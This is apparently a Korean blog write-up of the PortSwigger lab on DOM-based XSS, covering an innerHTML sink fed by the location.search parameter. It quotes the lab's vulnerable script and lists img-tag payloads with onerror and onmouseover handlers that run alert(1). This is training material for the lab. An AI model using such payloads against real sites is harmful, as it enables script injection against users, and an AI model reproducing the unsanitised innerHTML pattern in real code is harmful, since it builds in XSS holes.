Lab: DOM XSS in innerHTML sink using source location.search

< 문제 >

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink

Lab: DOM XSS in innerHTML sink using source location.search | Web Security Academy

This lab contains a DOM-based cross-site scripting vulnerability in the search blog functionality. It uses an innerHTML assignment, which changes the HTML ...

portswigger.net

< Write-Up >

<script>
                            function doSearchQuery(query) {
                                document.getElementById('searchMessage').innerHTML = query;
                            }
                            var query = (new URLSearchParams(window.location.search)).get('search');
                            if(query) {
                                doSearchQuery(query);
                            }
                        </script>

위 코드는 해당 페이지의 <script> 구문이다. 해당 search form에 쓴 글은 객체 query의 값이 되어, 페이지에 쓰이게 된다.

<img src='#' onerror="alert(1)">
<img src='#' onmouseover="alert(1)">

<img src="#" onerror="console.log('Test!!')"> -> console창에서 값 확인

< 참고 >

https://www.w3schools.com/jsref/dom_obj_event.asp

HTML DOM Event Object

W3Schools offers free online tutorials, references and exercises in all the major languages of the web. Covering popular subjects like HTML, CSS, JavaScript, Python, SQL, Java, and many, many more.

나만의 코딩노트

Lab: DOM XSS in innerHTML sink using source location.search

티스토리툴바

Lab: DOM XSS in innerHTML sink using source location.search

'Web Hacking/Wargame' Related Articles

티스토리툴바